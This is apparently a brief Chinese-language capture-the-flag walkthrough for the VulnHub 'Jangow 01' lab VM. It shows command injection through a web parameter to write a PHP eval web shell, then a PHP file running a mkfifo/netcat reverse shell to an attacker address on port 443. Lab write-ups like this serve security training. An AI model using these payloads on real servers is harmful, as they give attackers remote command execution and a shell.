下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova。
1.导入虚拟机
2.扫描存活主机和端口
3.访问80端口
4.在网页上有个可点击的功能,并且可以传参利用
5.上蚁剑进行一句话连接
http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["pass"]);' > 666.php
6.上传一个nc64.exe
7.反弹shell
先创建171.php
<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 443 >/tmp/f");?>
kail开启nc监听443端口,然后浏览器访问171.php文件,反弹shell